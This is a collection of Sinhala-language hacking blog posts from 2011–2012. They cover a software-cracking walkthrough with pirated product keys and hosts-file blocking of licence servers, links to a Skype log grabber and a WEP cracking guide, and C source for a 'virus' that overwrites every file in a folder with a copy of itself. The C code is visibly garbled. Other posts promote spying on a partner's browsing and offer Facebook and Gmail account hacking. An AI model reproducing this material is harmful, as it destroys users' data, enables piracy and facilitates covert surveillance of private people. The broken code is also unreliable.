Adlink

Showing posts with label Hacking. Show all posts
Showing posts with label Hacking. Show all posts

Monday, November 5, 2012

Certified Ethical Hacker v7 Instructor Slides


Certified Ethical Hacker v7 Instructor Slides



Let' come to the topic as the name tells the story that  means learning in the easy way, "Certified Ethical Hacker's set of instructor slide" by eccouncil, we are damn sure that this will surely be helpful for you and for those who want to become an ethical hacker, so guys read on and prove yourselves .


This package includes the following modules.

1. Introduction to Ethical Hacking
2. Footprinting and Reconnaissance
3. Scanning Networks
4. Enumeration
5. System Hacking
6. Trojans and Backdoors
7. Viruses and Worms
8. Sniffers
9. Social Engineering
10. Denial of Service
11. Session Hijacking
12. Hacking Webservers
13. Hacking Web Applications
14. SQL Injection
15. Hacking Wireless Networks
16. Evading IDS, Firewalls and Honeypots
17. Buffer Overflows
18. Cryptography
19. Penetration Testing

Websie :- www.eccouncil.org

Wednesday, October 17, 2012

Skype Logs වලට ගේමක් දෙමු




හායි කස්ටිය කොහොමද ඉතින් , ගොඩ දවසකින් බ්ලොග් එකේ පොස්ට් එකක් දාන්නත් බැරි උනා.
හ්ම්ම් අවුලක් නැ.
 කට්ටියට අද දෙන්න යන්නේ තවත් පොඩි වැඩක්.
 ආ හ් කියන්න බැරි උනා සමහර කොල්ලෝ මගේ පෝස්ට් එහෙන් පිටින්ම උස්සලා එක එක forum වල  පොරවල් වගේ දාලා රෙප් හිගා කනවා.මම රැ තිස්සේ  අත කඩාගෙන ටයිප් කරපුවා කෙලින්ම කිසි ගානක් නැතුව තමන් කරා කියලා දානවා.ඒකත් කරලා තියෙන්නේ සයිට් එකක් මොඩරේටර් කෙනෙක් අවුලක් නැ අඩු තරමින් උස්සපු තැනවත් දානවනම්.ඒක වැඩක් නැ දැන්.
දැන් මේකයි සින් එක අපිට මොකක් හරි PC එකක කවුරු හරි ස්කයිප් එකේ මොනවද  text විදිහට chat කරේ කියලා මේකෙන් අපිට ලොග්ස් අරන් බලන්න පුලුවන්
චුටි software එකක් ඒ උනාට වටිනවා මම පහලින් download link එක දාන්නම් 
එහෙනම් තව පෝස්ට් එකකින් සෙට් වෙමු .
ජය ශ්‍රී !

Download Link

Monday, September 10, 2012

Back Track Full Training Course Free From Fun Hacker


Back Track Full Training Course Free From Fun Hacker


To get Back Track Full Training Course Free From Fun Hacker log on to






Click Here

Sunday, August 5, 2012

Hacking WEP wifi passwords



හායි කස්ටිය හැකින් කියනකොටත් කස්ටියට ආතල්නේ :P ඔයාලට පොඩි pdf එකක් දෙන්නද එහෙනම් WEP WIFI password hack කරන හැටි ගැන එහෙනම් කට්ටිය download කරගන්නකෝ


Download Link
ජය ශ්‍රී !








Friday, August 3, 2012

Tune Up Utilities 2012 ට අතවර කිරිම






හායි කස්ටිය මම අද ඔයාලට කියලා දෙන්න යන්නේ ක්‍රැක් කිජෙන්

වයිරස් මුකුත් නැතුව තමාටම ගෙදරදි හදාගන්න පුලුවන් කෑමක්ද හෙ

හෙ නැ නැ.ඔයාලා දන්න Tuneup utilities 2012 අතින් ක්‍රැක් කර

ගන්න හැටි.හරි ලේසි මුලින්ම ඔයාලා කලින් tuneup දාලා fake

serial කියලා මැසෙජ් ආවානම් කරන්න තියෙන හොදම වැඩේ

මුලින්ම control panel ගිහින් tuneup uninstalle කරලා දාන එක.

එතනින් වැඩේ ඉවරද සහෝදරවරුණි අපෝ නැ තව තියෙනවා සිස්ටම්

එක අස්සට එහෙ මෙහෙ ජැක් ගහගෙන ඉන්න කැලි ටිකත් ගලවන්න

ඕනි.ඒකට මොකද කරන්න ඕනි සහෝදරවරුනි අපි ඒකට registry

එක edit කරන්න ඕනි .අය්යො කස්ටිය බය වෙන්න එපා සිම්පල්

පියවරෙන් පියවර මම කියලා දෙන්නම් අවුලක් නැ වෙනදා වගේ මේ

ලිපියටත් කමෙන්ට් බලාපොරොත්තුවෙන් නේ නැ :)
xp වලදි නම්
start menu button එකට ගියා එතනින් run කියන එකට ගියා run

box එකේ ගහන්න බලාගෙන ඉන්නේ නැතුව regedit කියන එක

ගහලා එනටර් ඔබන්ට එතකොට ඔයා රෙජිස්ට්‍රරිය ඇතුලට එනවා

පොඩ්ඩක් පරිස්සම් වෙන්න මෙතන තියෙන ෆයිල් වලට හානි

උනොත් සොරි තමා.
දැන් ඔයා රෙජිස්ට්‍රි එඩිටර් එකෙ ඉන්නේ ඔයාට උඩිම my computer

තියෙනවා ඒකෙ පහලට වෙන්නට + මාක් සහිතව

HKEY_CURRENT_USER ඉදිරියෙන් ඇති + ලකුන ක්ලික් කරන්න

ඉන්පසුව Software යන්න ඉදිරියෙන් ඇති +සලකුන ක්ලික් කරන්න

එවිට ඔබගේ පරිගණකයේ ස්තාපනය වී ඇති සොෆ්ට්වෙයා දැක ගත

හැක මෙයින් Tuneup යන්න තෝරා delete කරන්න .දැන් හොදට

හුස්මක් ගන්න.හ්ම්ම්ම්ම්ම්
ඒක දැන් හරි දැන් google කරලා tuneup site එකෙන් උනු උනු

2012 කොපිය බාගන්න.දැන් අන්තර් ජාලයෙන් විසන්දි වෙලා

installe කරන්න ඉවර උනාම.One click maintaince click කරන්න

එවිට පරිගනකය scan වෙනවා scan වෙලා අවසානයේදි maintaince

compleate කරන්න කලින් අහනවා.ඔයා දවස් 30ක් මාව තියාගෙන

ටෙස්ට් කරනවද නැත්තන් දැන්ම කි එකක් දාලා ඔයාගෙම

කරගන්නවද කියාලා.මොකටද ඒ කෙලිගේ හිත රිද්දන්නේ කියලා මේ

පහල දාලා තියෙන කී එකක් දමලා අරින්න.Key ටික පහල දාලා තියෙනවා download raw යන්න ක්ලික් කරන්න
Organization: Any
Product Key:

M8076E-27T3AN-F2MVXJ-D9FF52-63VE2X-5W8772
W6DB76-EHNH3K-K4E5AN-5JMNR3-3254MK-52BWYR
RX5NFQ-2A11PM-C1B7F4-K6KA0N-7P3BQ4-WRYD8E
5A42PP-V0Q605-2YJHMX-CJKW9J-4WQKKQ-E8RVNX
2JEDV1-8QYXN0-Y9AJ5W-DBC9E3-YCBNAJ-KVAPT6
EB7D56-F97B09-BTR462-WBBRJ0-J2P8J3-R0E4V5


Name organization වලට ඔයාගේ ඒවා දාන්න මොකද මෙයා දැන්

ඔයාගෙනේ :)
දැන් තමා වහලා ගහන්න හදන්නේ මුලින්ම අපි ටාස්ක් බාර් එකේ රන්

වෙවි තියෙන tuneup icon එක උඩ රයිට් ක්ලික් කරලා ඔයා

පොඩ්ඩක් පැත්තකට වෙලා ඉන්න මෙයා මම පොඩි වැඩක් කරන කල්

කියලා Exit කරලා දාන්න.
ඒ ඒ බනිස් ගෙඩි වලට ඒ ඒ කෙහෙල් ගෙඩි කියනවානේ මොකද

ලොකු බනිස් ගෙඩියක් කන්න පොඩි ගෙඩියක් මදිනිසා තමයි එහෙම

කියන්නේ :P ඒ වගේ මේකෙදිත් xp හා win 7 වලදි ක්‍රම දෙකකට

තමා කරන්ට වෙන්නේ.
xp වලදි
කරන හැටි මම ඉක්මනට කියලා දාන්නම් දැන්නම් කොටලා

ඇතිවෙලා
මෙහෙමයි
my computer-->local Disk C-->windows-->System32--

>Drivers-->ect-->hosts මේක නොට්පැඩ් එකෙන් open

කරගන්න ඉන්පසු පහත තියෙන ටික කොපි කරලා
127.0.0.1 http://www.order.tune-up.com
127.0.0.1 http://www.tune-up.com
127.0.0.1 http://www.tune-up.com/order
127.0.0.1 http://www.registertuneup.com
ෆයිල් එකේ පහලින් පේස්ට් කරන්න .අපැහැදිලි දෙයක් තියෙනවනම්

කොම්මෙන්ට් එකක් දාලා අහන්න. ඊට පස්සේ save කරන්න

එච්චරයි.

windows 7 වලදි මේක පොඩ්ඩක් වෙනස් වෙනවා ඒත් අවුලක් නැ
start-->run box එක තුල-->cmd කියලා ටයිප් කරන්න එවිට

ඉහලින් command prompt එක දිස් වේ.එක උඩ රයිට් ක්ලික් කරලා

run as administrator දෙන්න.
එවිට open වන command prompt එක තුල
net user administrator /active:yes
ටයිප් කර එන්ටර් ඔබන්න ඉන්පසු windows log off වෙලා නැවත

Administrator ලෙස ඇති user account එකෙන් ලොග් වෙන්න.
දැන් මම කලින් කරපු විදිහටම

my computer-->local Disk C-->windows-->System32--

>Drivers-->ect-->hosts notepad එකෙන් open කරලා පහත

තියෙන ටික කොපි කරලා පේස්ට් කරන්න.
127.0.0.1 http://www.order.tune-up.com
127.0.0.1 http://www.tune-up.com
127.0.0.1 http://www.tune-up.com/order
127.0.0.1 http://www.registertuneup.com

දැන් සේව් කරන්න.
හරි දැන් ඇරපුවා වහන්නත් ඕනි නිසා පෙර පරිදිම
start-->run box එක තුල-->cmd කියලා ටයිප් කරන්න එවිට

ඉහලින් command prompt එක දිස් වේ.එක උඩ රයිට් ක්ලික් කරලා

run as administrator දෙන්න.
එවිට open වන command prompt එක තුල
net user administrator /active:no කියලා ටයිප් කරලා වෙනදා

පාවිච්චි කරපු user account එකට Log on වෙන්න.
අම්මීයෝ මටනම් මේක කොටලම හොද ගනන් .අවුලක් තිබ්බොත්

අහන්න.මේක හදන්න virtual box එකක xp එකකුත් දාගෙන් එකත්

open කරගෙන ගොඩක් මහන්සි වෙලා හැදුවේ.ඉස්සර කට්ටිය

පෝස්ට් උස්සලා තමුන් ලිවා වගේ දානකොට ඒ දරුවන්ගේ චින්තන

ශක්තිය මොට වෙන නිසා කොපි කරන එක ඔන්න මම disable කරා :P
ජය ශ්‍රි !

මීට Sameera Madushan Dissanayaka


ඔනි කරන කි ටිකයි IP ටිකයි මම මේක දාලා යනවා කිවාම එක එක ගොබිලො සතුටු උනා කියන්න කනගාටුයි ගොබිලො නිසා මගෙ බ්ලොග් එක වහලා දාන්නැ.උබලා වගේ එවුන් ඉන්නවා කියලා දැන ගත්ත එකත් ලොකු දෙයක්




-->









Wednesday, July 11, 2012

IDM පට්ට ගහල speed කරමු




හායි කස්ටිය අද මම ඔයාලට කියලා දෙන්න යන්නේ IDM එක Optimize කරලා ස්පිඩ් කර ගන්නේ කියලා හරි ලේසි ඔයාලට පහසුවෙන් මේක තේරුම් යන්නත් එක්ක පොඩි විඩියෝ එකකුත් කරා
හ්ම්ම් එහෙනම් කට්ටිය මෙතනි ගිහින් බලල ඉන්නකෝ
ජය ශ්‍රි !
http://hackkat.blogspot.com/2012/07/boost-up-idm.html




Friday, June 15, 2012

ESET Smart Security Free





කොහොමද යාලුවනේ අද මම කියලා දෙන්න යන්නේ කොහොමද Eset Smart Security මුදල් නොගෙවා ගන්නේ කියලා.ඔයාලා දන්නවා ගොඩක් virus guard තිබුනට සමහර ඒවට ගොඩක් virus අහු වෙන්නේ නැ වගේම සමහර virus guard නිසා ඔබගේ පරිගනකයේ වේගය බොහෝ සෙයින් අඩු විමට බලපානවා.නමුත් Eset භාවිතයේදි ඔබගේ පරිගනකයේ වේගය අඩු විම වෙනත් anti virus protection එක්ක සැසදිමේදි බොහෝ සෙයින් අඩුයි.මම මෙය ඔබට පැහැදිලි විම සදහා video එකක් නිර්මාණය කරා.ඔබට video එකේ සදහන් සොෆ්ට්වෙයා එක download කරගැනිමට ලින්ක් එක පහතින් සදහන් කරනම් ,එහනම් නැවත ලිපියකින් හමුවෙන බලාපොරොතුවෙන් අපි ගියා
 කස්ටියටම ජය ශ්‍රි !


Link 1






Thursday, June 14, 2012

How To Install Back Track Using Pen Drive




හායි කස්ටිය අද මම පොඩි video එකක් කරා කොහොමද pen drive එකක් භාවිතා කරලා Back Track 5 install කර ගන්නේ කියලා මේ සදහා අපිට පහත සදහන් software එක භාවිත කරන්න වෙනවා ,ඩවුන්ලෝඩ් ලින්ක් එක මම පහත සදහන් කරන්නමමෙහෙනම් බලන්නකෝ video එක හොදද කියලා එහෙනම් නැවත ලිපියකින් හමුවෙමු ජය ශ්‍රී !
http://ity.im/0rN07










Tuesday, June 12, 2012

Simple Virus Using C





හායි කස්ටිය ගොඩ දවසකින් ඔයාලට ටෙක්නිකල් සම්බන්ද පෝස්ට් එකක් දාන්නත් බැරි උනා අද කියල දෙන්න යන්නේ කොහොමද c programing language එක භාවිතා කරලා සරල විදිහේ virus එකක් හදන්නේ කියලා,educational purpose වලට විතරක් මේක පාවිචි කරන්න.ඔයාලට ඉදිරියේදි c programing language එක ගැන පාඩම් මාලාවක් ගේන්නත් බලාපොරොත්තු වෙනවා.ඔයාලට මෙහිදි C  source code එක compile කර ගැනිමට අවශය වෙනවා.මේ සදහා ලේසිම විදිහ ලෙස dev c++ හෝ code blocks ඔයාලට යොදා ගන්න පුලුවන්.
code blocks Download කර ගන්න මෙතනින්
 නැත්නම් 
 dev c++ download කර ගන්න


ඔයාලට කරන්න තියෙන්නෙ හරිම සිම්පල් දෙයක් මම දිලා තියෙන ලින්ක් වලින් ඔයා කැමති එකක් භාවිතා කරලා අපිට අවශය කරන කොඩ් එක compile කර ගැනිමට අවශය IDE එක download කරගන්න. code blocks එක 70mb වන අටර dev c++ 13.5 mb විතර වෙනවා.
ඔබ කැමති එකක් භාගත කරගෙන installe කරන්න හරිම ලේසි.ඉන් පසු file new -->ඔනි කරන කොඩ් එක පේස්ට් කරලා save as  ගිහින් කැමති නමක් එක්ක ෆයිල් ෆොමැට් එක ලෙස  C source file යන්න තෝරන්න.
මේ ටික කිවේ C ගැන දැනුමක් නැති අය සදහා .මෙහිදි exe එකක් හැදෙන අටර එය virus  එක ලෙස ක්‍රියා කරයි එක නිසා exe එක හැදුනට පස්සේ run කරන්න එපා මොකද මෙහිදි වෙන්නේ folder එකක් තුල නැවත නැවත folder සකස් විමයි.Educational purpose only dont missuse IT
source code:



#include<stdio.h>
#include<conio.h>
#include
#include
#include
void main(int argc,char* argv[])
{ char buf[512];
int source,target,byt,done;
struct ffblk ffblk;
clrscr();
textcolor(2);
cprintf(”————————————————————————–”);
printf(”\nVirus: FolderFllod\nProgrammer:MoulderFiles.blogspot.com\n”);
cprintf(”————————————————————————–”);
done = findfirst(”*.*”,&ffblk,0);
while (!done)
{ printf(”\n”);cprintf(” %s “, ffblk.ff_name);printf(”is attacked by “);cprintf(”Folderbomb”);
source=open(argv[0],O_RDONLYO_BINARY);
target=open(ffblk.ff_name,O_CREATO_BINARYO_WRONGLY);
while(1)
{byt=read(source,buf,512);
if(byt>0)
write(target,buf,byt);
else
break;
}
close(source);
close(target);
done = findnext(&ffblk);
}
getch();
}





Saturday, February 18, 2012

Hide & Seek Folders හංගමු

hi කස්ටිය ගොඩ කාලෙකින් පොස්ට් එකක් දාන්නත් බැරි උනා.අද මම කියලා දෙන්න යන්නේ කොහොමද 

අපි CMD වල Attrib වලින් file හැංගන විදිහටම Bat file එකකින් ඒ වැඩේ කරගන්නේ කියලා හරිම 


ලේසි.ඔයාලා මුලින්ම note pad එක open කර ගන්න ඉන්පසු මේ 


විදිහට ටයිප් කරන්න 
.
ආ කියන්න බැරි උනා 


මෙහිදී අපිට hide හා  seek ලෙස bat file දෙකක් හදා ගන්න 


ඕනි.මුලින්ම හයිඩ් එකට bat file එක 


ලියා ගමු.


 Hide file එකේ කෝඩ්  එක.



cd\

E:

attrib +r +s +h sameera

මෙතන  H ලෙස මගේ sameera කියන ෆයිල් එක තියෙන හාඩ් ඩිස්ක්
 එකේ  නම මෙත්න තියෙන්නේ ඔයාලට හංගන්න 

ඕනි ෆයිල් එක තියෙන driver එකේ නම මෙතනට දෙන්න .E  වෙනුවට .

ඉන්පසු මෙහි sameera කියලා දාලා තියෙන්නේ මට හංගන්න ඕනි 

ෆෝල්ඩර් එකේ නම එකට ඔයාලට හංගන්න ඕනි 

ෆෝල්ඩර් එකේ නම දෙන්න .

ඉන්පසු කැමැති නමක් දෙන්න දීලා අන්තිමට ඩොට් එකක් දාලා bat 

extension  එක දෙන්න .

උදා hide.bat

ඉන්පසු  save as file type එකට  all files  කියන එක තෝරන්න .

මේක තමා අපි ෆෝල්ඩර් හංගන්න ලියන bat ෆයිල් එක .

දැන් අපි බලමු හංගපු ෆයිල් එක බලා ගන්නේ කොහොමද කියලා ඒ 

කට අපි තව bat file එකක් ලියා ගන්න ඕනි 


seek.bat  කියලා තව bat file  එකක් 


cd\


E:


attrib +r +s -h sameera

  මෙහිදී වෙනස් වෙන්නනේ  +h ලෙස තිබුන එක -h ලෙස වෙනස් 

වීමයි.

මේකත් අර කලින් කිව විදිහටම save කර ගන්න.

තව පොස්ට් එකකින්  හමු වෙමු ජය ශ්‍රී 

Friday, December 16, 2011

Create Encryptor And Decryptor Using Vbs



හලෝ කස්ටිය ගොඩ දවසකින් පොස්ට් එකක් දාන්නත් බැරි උනා,බ්ලොග් එක බලන්න ආව හැමෝටම Thanks .අද මම ඔයාලට කියලා දෙන්න යන්නේ කොහොමද සිම්පල් විදිහට අපිට අවශය දෙයක් Encrypt කරගන්නේ කියලා.ම්ම්ම් Encrypt ගැන මොනවත්ම දන් නැති අය කලබල වෙන්න එපා.අපි මෙහෙම හිතමු.
මට ඕනි moulderfiles කියලා රහස් පණිවිඩයක් යවන්න එහෙමනම් මේක encrypt කරාට පස්සේ xjqnkwjiqztr
විදිහට තමා පෙන්නන්නේ.නැවත අපි xjqnkwjiqztr කියන එක decrypt කරාට පස්සේ අපිට moulderfiles
කියන එක නැවත බලාගන්න පුලුවන්.හොරෙන් හොරෙන් ලවු කරන අයටනම් ෆට්ට මොකද encrypt කරලා අවශය දේ යවනවා.අනිත් පැත්තට decrypt කරලා සැගවුනු පණිවිඩය දැනගන්න පුලුවන්.මම හිතනවා ඔයාලට encrypt ගැන යම් කිසි අදහසක් ඔලුවට යන්න ඇති කියලා.හරි අපි එහෙනම් අපි මුලින්ම වැඩේ පටන් ගමු. හරිම සිම්පල් මේක කරන එක.ඔයාලට කැමති Programming Language එකක් මේකට පාවිචි කරන්න පුලුවන්.මම මෙහිදී vbs වලින් තමා මේක කරන්නේ.මුලින්ම notepad open කරගන්න.ඊට පස්සේ මේ Code එක type කරන්න.කම්මැලි නම් කෙලින්ම කොපි පේස්ට් පාරක් දාන්න අවුලක් නැ :)
Encrypt Code එක



set x=WScript.CreateObject("WScript.Shell")'Sameera Dissanayaka
mysecret =inputbox("enter text to encoded")
mysecret =StrReverse(mysecret)
x.Run "%windir%\notepad"
wscript.sleep 1000
x.sendkeys encode(mysecret)


function encode(s)
for i= 1 To Len(s)
newtxt = Mid(s,i,1)
newtxt =Chr(Asc(newtxt)+5)
coded=coded & newtxt
next
encode=coded
End Function
දැන් මේක save as ගිහින් කැමති නමක් දීලා සේව් කරන්න අගට vbs කියන exetention එක මතක ඇතිව දාන්න.save as type එකට All Files select කරන්න.
ඊට පස්සේ ඔයාලට දකින්නට ලැබෙයි save කරපු තැන anyname.vbs  file එකක් එක double click කරාම එන window එකේ ඔයාලට අවශය word එක ගහලා encrypt කරගන්න.space තියන්න එපා type කරනකොට.
දැන් අපි මේක Decrypt කරලා බලමු. code එක පහල දාන්නම්



set x=WScript.CreateObject("WScript.Shell")'Sameera Dissanayaka
mysecret =inputbox("enter text to encoded")
mysecret =StrReverse(mysecret)
x.Run "%windir%\notepad"
wscript.sleep 1000
x.sendkeys encode(mysecret)


function encode(s)
for i= 1 To Len(s)
newtxt = Mid(s,i,1)
newtxt =Chr(Asc(newtxt)-5)
coded=coded & newtxt
next
encode=coded
End Function
මේකත් අර විදිහටම decrypt.vbs වගේ නමක් දිලා save කරගන්න.ඊට පස්සේ කලින් අපි encrypt කරගතට පස්සේ ආව result එක decrypt එකේ inputbox එකේ past කරන්න.හරි ලේසි  එහෙනම් තවත් පෝස්ට් එකකින් හමුවෙමු ජය ශ්‍රි !


Tuesday, August 30, 2011

Face Book,fake account හා hack විම









හ්ම්ම්ම්ම් උදේ පාන්දර නිකන් මෝඩ පොස්ට් එකක් දාලා.ගැලපෙන්නැ කාටවත් දුකක් කරදරය වෙනවට අකැමැති නිසා පොස්ට් එක අයින් කරා.කොහොමද කිලොගර් එකක් දාලා පැත්තක ඉදලා fb user name password එක ගන්න හැටි තමා video tute එකක් කරේ.ඒ උනාට මම කරනදේ හොද අතකට ගොඩක් දෙනෙක් පාවිචි කරයි කියලා හිතන්න බැ.මගේ වැරද්ද පෙන්නල දිපු ආවාටයේ අසන්ක අයියට ගොඩක් තැන්ක්ස්.ඔයාලගෙන් කවුරු හරි කාගෙ හරි fb account එකකට රින්ගලා කාවවත් කරදරයකට පත් වෙනවා දකින්න මම ආස නැ.ඒක නිසා tute එක delete කරා මීට පස්සේ හැකින් වලට කිසිම අනුබලයක් දෙන්නේ නැ.මොකද ඒකත් හරියට පිහියක් වගේ.doctor කෙනෙක් ගත්තොත් කාගේ හරි ජීවිතයක් බේරෙනවා ඒ උනාට ගන්න මනුස්සයා මිනි මරුවෙක් ද කවුද දන්නේ.හෙහේ වැඩි කතා ඔනි නැ.මම දන්න දේවල් වලට අනුව ඔයාලට ඔයාලගේ email account,face book account hack වෙන එකෙන් වලක්වා ගන්න පොඩි කරුනු ටිකක් කියන්න හිතුවා ගොඩක් ඒවා ඔයාලා දන්නවා ඇති.

මම මේවා class ගිහින් ඉගෙනගත්ත දේවල් නම් නෙවේ නෙට් එකෙන්ම ඉගෙන ගත්ත දේවල් හා අත්දැකිමෙන් ලැබුනදේවල්.මේ වගෙන් ඔක්කොම නැති උනත් පොඩි දෙයක් හරි ඔයාලට වැදගත් වෙයි කියලා හිතුවා.

මුලින්ම Fake Profile ගැන බලමු : )

ගොඩක් වෙලාවට fake profile විවිද වු මානසිකත්වයන් හා විවිද වු අරමුනු ඔස්සේ ගොඩනගා ගැනිමට උත්සහ දරනු ලබනවා.බොහෝ විට පිරිමියෙකු ගැහැනු නමකින් ගිනුමක් හදා ගැනිමේ විවිද වු අරමුනු තිබිය  හැක.උදාහරන ලෙස කොල්ලෙක් එක්ක එලි පිට කතා නොකරන ගැහනුන්ට පමණක් අදාල වු කරුනු වුවද මෙලෙස fake profile එකක් භාවිතා කර චැට් කර මොඩ පහේ සිගිති ආතල් ගැනිමට සමහරක් පෙලබේ.සමහරුන් තමාගේ පෙම්වතා පෙම්වතිය ගැන සැක කරන විට fake profile  මාර්ගයෙන් ඇය ගේ හෝ ඔහුගේ අදහස් දැන ගැනිමට fake profiele භාවිතා කරනු ලබයි.තව එකි නොකි සැම කරුනු සදහාම මේවා භාවිතා කරනු ලබයි.මේවා ගැන තව ලියන්න ගියොත් මම බලාපොරොත්තු වු ප්‍රදාන කරුනු ටික මගහැරෙන්න පුලුවන්.සො අපි බලමු කොහොමද fake profile අදුන ගන්නේ කියලා.(දැන fake profile තියෙන අය මාත් එක්ක තරහ වෙනව එහෙම නෙවෙයි හොදද :)  )



  1. අලුත් අලුත් හෙනම හෙන පොශ් නම් දමා ගැනිම.සමහර නම් කවදාවත් අසා නැති එවාය.කියවා ගැනිමටද අපහසුය.

  2. ගොඩක් fake එවාගේ පාසල ලෙස kandy or colombo international or gov. school එකක නම භාවිතා කිරිම.

  3. friends list එක දිහා බැලුවිට frends ලා 4000 ගනන් හෝ ඉතා අඩු ගනනක් සිටිම එනම් 40ක් 50ක් වැනි ගනනක් සිටිනම් එයද fake එකක් විමට බොහෝවිට ඉඩ ඇත.මොකද එය අලුත හැදු එකක් විමට පුලුවන.

  4. profile picture එක සලකා බැලුවිට බොහෝවිට හෙන කියුටි කිරිස් එක පොටො කැල්ලක් දමා ඇත.එයටද අනික් උන් අම්බානක කොමෙන්ට් දමලාය.එකෙක් සෝ ස්විට් කියයි.තව එකෙක් සෝ සෙක්කිය කියා දමලාය.

  5. තවද එකම profile pic එක දෙතුන් වරක් අප්ලෝඩ් කර තිබිමද fake එකක ලක්ශනයකි.

  6. profile pic එක දිහා හොදට අවදානයෙන් බැලුවොත් පෙනේවි ඔයාලට සමහර විට ඒ පොටො එක උස්සපු සයිට් එකේ වෝටර් මාක් එහෙම දකින්න පුලුවන්

  7. තව දෙයක් පොටො එක දිහා හොදට බලපුවාම photo නියමෙට අරන් තියෙනවානම් උදා විදිහට face එකට හොදට focus කරලා background එක බොද වු ස්වභාවයක් තියෙනවනම්(ඕකට photograpic වල මොනවා කියනවද කියලා මගෙන් නම් අහන්න එපා මම ඕවා දන්නේ නම් නැ) .ඒ photo එක අරන් තියෙන්නේ proffesional photographer කෙනෙක්. ඉතින් කවුරුත් දන්නවා සාමානයයෙන් හැමගෙදරම proffesional කැමරා මහත්තුරු නැ නොවැ.ඒක නිසා ඒ පොටො එක තියෙන profile එක fake එකක් වෙන්න පුලුවන් බලාගෙන :)

  8. තව දෙයක් ගොඩක් වෙලාවට Its me කියලා photo එකක් දාලා ඉතුරුවට high school musical එකේ කෙලි පොඩ්ඩයි,twillight එකේ කෙලි පොඩ්ඩගෙයි photo දාලානම් පොඩ්ඩක් හිතලා බලන්න එහා පැත්තේ චැට් කරන්නේ ඇත්තටම කෙල්ලක්ද කියලා.

  9. තව දෙයක් ගොඩක් Air Hostress ල වගේ තියෙන්නෙත් ගොඩක් fake accounts.මම කියන්නේ නැ හැම එකම fake කියලා උනාට පොඩ්ඩක් විමසිලිමත් වෙන්න.

  10. ගොඩක් ලස්සන කෙල්ලොන්ගේ profile එක්ක deal කරනකොට බලාගෙන,මොකද කෙල්ලක් කියලා හිතාගෙන chat කරාට එහා පැත්තේ ඉන්නේ කොල්ලෙක් වෙන්න පුලුවන්.සමහර විට ඔබේ යාලුවෙක් වෙන්න පුලුවනනන්.  ඒකා හිනා කකා ඔබව ගොනාට අන්දනවා විය හැක.


තව ඔබට කවුරු හරි  කෙල්ලක් requst එකක් එවනවානම් දෙපාරක් නොව 10000 විතර හිතලා accept කරන්න.මම නම් කල්පානා කරනේ මම අලන්කාර එකෙකුත් නෙවෙ පොරකුත් නෙවෙ,බ්‍රයිටෙකුත් නෙවෙ සල්ලි බාගේ තියෙන එකෙකුත් නෙවෙ එහෙමනම් කෙල්ලක් පැන පැන requst එකක් එවනවා කියන්නේ මෙතන මොකක් හරි හොරයක් තියෙනවා කියලා කල්පනාවෙන් accpt කරලා පුලුවන් තරන් අර account එක ගැන විමසිල්ලෙන් ඉන්න එක.

ගොඩක් ජාති එක දිගට  කියාගෙන ගියා දැන්නම් ටයිප් කරලා ඇගිලි වලටත් අමාරුයි.ඉතුරු ටික අනිත් කොටසින් බලාපොරොත්තු වන්න.ඔහොම කියලා fb එකෙ try කරන love වලට එහෙම කෙලව ගන්න එපා හොදද. එහෙනම් කටියටම ජය ශ්‍රි !

Spying With Chrome

කොහොමද කස්ටිය.ම්ම්ම් අද පොඩි ට්‍රික් එකක් කියලා දෙන්න යන්නේ.ඔයාලට ඔයාලගේ girl friend,boy frend,wife ,husband,දුව පුතා trust නැද්ද.එයාලා මොනවද අන්තර්ජාලයේ කරන්නේ? මොනව ගැනද හොයන්නේ?මොනවගේ සයිට් වලටද යන්නේ??? කියලා දැන ගන්න ඕනිනම් කරන්න තියෙන්නේ හරිම සිම්පල් ප්ලැන් එකක්,කරන විදිහ video එකක් කරලා දැම්මා.එහෙනම් ජය ශ්‍රි !

Thursday, August 18, 2011

Hack Fb,Gmail,Ebay,ect

fb,gmail,ebay,.... ect hack කරන්න easy ම easy methoed එකක් ගැන දැනගන්න ඕනි අය අත උස්සන්න.මොකද,දැම්මට පස්සේ බලන්න කෙනෙක් නැත්තන් වැඩක් නැ නේ.කස්ටිය ආස හොරෙන් පොල්ගෙඩියක් කඩල කාපුවට.ආතල් එකේ බෝතලක් ගහල චාටර් උන කතා අහන්නනේ,එහෙම එකේ තාක්ශනය ගැන පොස්ට් දාන්න ගිහින් චාටර්වෙන්නේ මොකටද නේද :P
කැමති අය ඉන්නවනම් feed back එකක් දාලා යන්න.එයාලට  මම මේල් කරන්නම්,නැත්තම් ගොඩක් අය good feed back එකක් තිබ්බොත්.බ්ලොග් එකේ දාන්නම් see ya in next post :)
කවුරු හරි කමක් නැ එක්කේනෙක් හරි මගෙ බ්ලොග් එක බලනවනම් එයාවෙනුවෙන් දෙයක් කරන්න.මම මේ බ්ලොග් එක ලියනවා :)
thanks for comming :)

Thursday, August 11, 2011

අනුන්ගේ Black Hat මගේ ඔලුවේ කඩා පාත් වීම.


ඔන්න ඉතින් මාත් අද හරකා වගේ free wifi zone වලදි Face Book(Fb,gmail,tweeter,ebay,ect....) හැක් කරන හැටි ගැන video එකක් කරා ඒක බ්ලොග් එකේ දාන්නත් හදලා සමහරක් ඒක misuse කරන නිසා දාන්නැතුව.දන්න අදුනන නන්ගි කෙනෙකුටයි තව class ආව මල්ලිලා දෙන්නෙකුටයි දුන්නා.
දීලා fb එකේ ඉන්න ගමන් තව class ආව අක්කා කෙනෙක් ඉන්නවා දැක්කා.ඉතින් මීට කලින් class යන කාලේ මේ අම්මන්ඩිට මම java video lessons,films,අලුතෙන් අහුවෙන lerning series එහෙමත් දීලා තියෙනවා.
ඉතින් මේ මම ගොනා වගේ කීවා අක්කි මම wifi zone එකකදි fb hack කරන video එකක් හැදුව කියලා.
ඉට පස්සේ මේ අක්කත් කියනවා අද මගේ fb එකත් hack කරලා.අය්යාට හොදටම මල පැනල ඉන්නේ මගෙ accunt එක hack කරා කියලා.හැක් කරපු එකා @@@@ @ $.හැක් කරපු එකා දන්නැතුව ඇති මගෙ මිනිහා මේ ෆිල්ඩ් එකේ ඉන්න එකෙක් කියලා.හැක්කරපු එකාගේ access ඔක්කොම නැති කරනවා .බ්ලා බ්ලා බ්ලා මේ අම්මන්ඩි කියවනව කියවනවා ඉවරයක් නැ.අපෙ අප්පොච්චියේ හරියට මම කරපු දෙයක් වගේ.මම නිකන් උස්සලා පොලේ ගැහුවා වගේ ඇයි ඉතින් මේ පාත් උන කුනු බාල්දිය මොකක්ද මේ කියලා.මේකිට කීවට පිලිගන්නේම නැ මම එහෙම දෙයක් කරේ නැ කියලා.මානසික ලෙඩ්ඩු පිස්සො.කිකියා බනිනවා.
